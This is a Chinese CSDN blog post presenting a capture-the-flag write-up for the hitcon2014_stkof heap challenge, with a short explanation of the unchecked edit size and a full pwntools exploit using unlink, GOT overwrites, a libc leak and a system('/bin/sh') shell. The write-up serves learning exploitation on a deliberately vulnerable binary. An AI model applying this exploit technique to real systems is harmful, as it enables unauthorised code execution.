hitcon2014_stkof

最新推荐文章于 2024-01-28 08:16:53 发布
最新推荐文章于 2024-01-28 08:16:53 发布
阅读量294 收藏
点赞数
分类专栏: buuctf 题目
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zzq487782568/article/details/122182106
版权

pwn

hitcon2014_stkof

查看保护
请添加图片描述
请添加图片描述
在edit这个功能下可以输入size。没有对size进行判断,这里产生了溢出。
unlink即可。unlink控制堆指针为got表,接着就可以改got为puts,泄露出libc,改got为gadget或system。具体unlink知识看z1r0’s blog

from pwn import *

context(arch='amd64', os='linux', log_level='debug')

file_name = './z1r0'
debug = 1
if debug:
    r = remote('node4.buuoj.cn', 29169)
else:
    r = process(file_name)

elf = ELF(file_name)

libc = ELF('./2.23/libc-2.23.so')

def create(size):
    r.sendline('1')
    r.sendline(str(size))

def edit(index, size, content):
    r.sendline('2')
    r.sendline(str(index))
    r.sendline(str(size))
    r.send(content)

def delete(index):
    r.sendline('3')
    r.sendline(str(index))

def dbg():
    gdb.attach(r)


create(0x100)
create(0x30)
create(0x80)

fd = p64(0x602140 - 0x8)
bk = p64(0x602140)

fake_chunk = p64(0) + p64(0x20) + fd + bk + p64(0x20)
fake_chunk = fake_chunk.ljust(0x30, b'a')
p1 = fake_chunk + p64(0x30) + p64(0x90)

edit(2, len(p1), p1)
delete(3)

free_got = elf.got['free']
puts_got = elf.got['puts']
atoi_got = elf.got['atoi']
puts_plt = elf.plt['puts']


p2 = p64(0) + p64(free_got) + p64(puts_got) + p64(atoi_got)
edit(2, len(p2), p2)

p3 = p64(puts_plt)
edit(0, len(p3), p3)
delete(1)

puts_addr = u64(r.recvuntil('\x7f')[-6:].ljust(8, b'\x00'))
success('puts_addr = ' + hex(puts_addr))
libc_base = puts_addr - libc.sym['puts']

system_addr = libc_base + libc.sym['system']


p4 = p64(system_addr)
edit(2, len(p4), p4)

r.sendline('/bin/sh\x00')

r.interactive()
z1r0.
关注
专栏目录
2014 HITCON stkof 的 exp
哒君的博客
07-23 514
思路借鉴于ctf-wiki,但ctf-wiki之中的思路较简略,且exp有一点疏忽的地方,故在此记录
2014 HITCON stkof writeup
Morphy_Amo的博客
01-24 2112
文章目录writeup 题目链接 1、查看安全策略 root@kali:~/ctf/Other/pwn/heap# checksec stkof [*] '/root/ctf/Other/pwn/heap/stkof' Arch: amd64-64-little RELRO: Partial RELRO Stack: Canary found NX: NX enabled PIE: No PIE (0x400000) 可以看
2014_hitcon_stkof
m0_57754423的博客
02-10 1347
题目是wiki上的一道题目,对应的知识点是unlink,也是因为一些事情很久没有学pwn了,下面简单分析一下这道题目。 漏洞是在编辑chunk的功能里存在的: 可以任意大小的向chunk里输入内容。 我们已知存储chunk数组的地址,同时可以修改next_chunk的 pre_size位和size位,可以采用unlink。 unlink的核心思想就是,通过相关的检查,将一个chunk从一个chun的链表中取出,然后与其地址相邻的free状态的chunk进行合并。 本题的利用思路就是: 通过编
houseoforange_hitcon_2016
fayinq的博客
04-07 273
houseoforange_hitcon_2016 先检查保护 保护全开 FSOP:对于_IO_FILE_plus结构体的利用 首先,在分析这个题目之前,我们需要知道两个知识点,一个是_IO_FILE_plus,一个是FSOP _IO_FILE_PLUS _IO_FILE_plus是ptmalloc中定义的一种结构体,他决定了很多东西,先在gdb里面查看一眼 在此,我们就用本次题目中会使用到的_IO_list_all结构体来作为参考。 _IO_FILE_plus 主要是由两个部分组成,其中一个是_IO
信息安全_数据安全_HITCON_Badge_2019_秘辛:MCU_ARM_Tru.pdf
08-22
【标题】"信息安全_数据安全_HITCON_Badge_2019_秘辛:MCU_ARM_Tru.pdf" 涉及的是2019年HITCON活动的安全挑战,重点在于利用ARM TrustZone技术在微控制器(MCU)上的应用,特别是与数据安全和信息安全建设相关的内容...
信息安全_数据安全_HITCON_GIRLS_成果分享與_CyberSec_week.pdf
08-22
HITCON GIRLS是一个以女性为主体的信息安全社区,致力于推广信息安全学习和提升科技行业的包容性。 【HITCON GIRLS】 HITCON GIRLS社区通过组织各种主题的读书会,鼓励女性成员深入学习信息安全知识和技术,促进...
[BUUCTF]PWN——hitcon2014_stkof
mcmuyanga的博客
01-18 835
hitcon2014_stkof 附件 步骤: 例行检查,64位程序,开启了canary和nx 本地试运行一下看看大概的情况, 64位ida载入,给程序的函数改了一下名,方便看,这是道堆,不过没有打印菜单 main(),v3=4的那个函数感觉没什么用,就不截图了 add() del() edit() 利用点在edit() 它向存储在s[v2]的这个数组中的指针开始的地址读入n数个字符(n由我们输入,可以溢出),也就是说,只要我们能够修改s[v2]中存的指针,就可以实现任意地址写。程序没有开启r
hitcon2014_stkof(unsorted bin unlink)
seaaseesa的博客
04-09 823
hitcon2014_stkof 首先,检查一下程序的保护机制 然后,我们用IDA分析一下,edit功能存在溢出。 程序没有show功能。 由于没有开启PIE,got表也可以修改,因此,我们利用unlink控制堆指针为got表,然后修改strlen的got表为puts的plt表,即可实现show的功能,进而泄露glibc地址,后续利用。 #coding:utf8 from ...
unlink小结 && 2014_hitcon_stkof
Pwnpanda的博客
08-02 1375
暑假学习计划 - 0x02 关于unlink的学习资料以及本例题的wp都很多,本篇主要是做个小总结,内附较为详细的调试图片以便初学者理解 (自从入了堆坑学unlink,到现在差不多一个半月了,真的是死去活来,也怪自己的基础差,现在算是理解一些了,先记下来等以后深入理解后再补充,在此感谢各位师傅的帮助,尤其是kaka师傅) 先放基础学习链接: Linux堆溢出漏洞利用之unlink http...
2014 HITCON——stkof
04-20 229
64位程序,没开PIE  #unlink 程序逻辑 1 __int64 __fastcall main(__int64 a1, char **a2, char **a3) 2 { 3 int v3; // eax 4 signed int v5; // [rsp+Ch] [rbp-74h] 5 char nptr; // [rsp+10h] [r...
buuctf pwn hitcon2014_stkof 初识unlink
weixin_45677731的博客
08-02 749
最近开始学堆,看了wiki和一些大佬的文章搞懂了这个有关unlink的题目:hitcon2014_stkof 首先拖进ida,看看几个主要的函数: 函数1,创建对,同时可以看到,堆的地址被存储在了s处,点进去看看 发现是bss段,像这样的指针,就是这类题目的一个特征 函数2,编辑堆内容,长度可以自己设置,有堆溢出漏洞 函数3,free堆 函数4用处不大 先把三个函数写好: def alloc(size): sh.sendline('1') sh.sendline(str(size))
[BUUCTF]-PWN:hitcon2014_stkof解析(unlink)
最新发布
2301_79326813的博客
01-28 781
又是一道堆题,先看保护关键信息,64位,没开pie。再看ida大致就是alloc创建堆块,free释放堆块,fill填充堆块内容,以及一个看起来没啥用的函数,当然我也没利用这个函数去解题这里有两种解法。
unlink buuctf hitcon2014_stkof 个人粗浅理解
carol2358的博客
05-13 688
菜鸡终于对unlink有了些许的了解,写一下自己的理解,用来备份 unlink就是从双向链表中取出元素的行为 感谢网上的多篇前辈的文章,其中这篇让我收获最多 https://bbs.pediy.com/thread-247007.htm unlink 用来将一个双向链表(只存储空闲的 chunk)中的一个元素取出来,可能在以下地方使用 malloc 从恰好大小合适的 large bin 中获取 chunk。 这里需要注意的是 fastbin 与 small bin 就没有使用 unlink,这就是为什么漏
unlink 2014 HITCON stkof
九层台
08-03 607
这里有一个很坑的问题,ubuntu18和之前的版本堆的管理策略好像不太一样网上说的关于堆的策略的问题可能对ubuntu18有些不太适用。 所以环境就从原本的18改为了16 关于unlink的介绍参考https://ctf-wiki.github.io/ctf-wiki/pwn/heap/unlink/ http://yunnigu.dropsec.xyz/2017/04/05/%E5%A0%...
2014_hitcon_stkof学习
a2590035252的博客
08-29 966
适用于和我一样的广大pwn菜鸡
[hitcon 2017]ssrfme 1
04-11
这道题目是一个SSRF漏洞题目。SSRF全称为Server Side Request Forgery,是一种常见的Web安全漏洞。当存在SSRF漏洞时,攻击者可以将服务器作为代理,进而访问在内部网络中无法访问的资源,如内部Web应用、数据库等。此题的目标是通过一个输入参数包含的URL,探测出内部的flag并输出。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

z1r0.

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值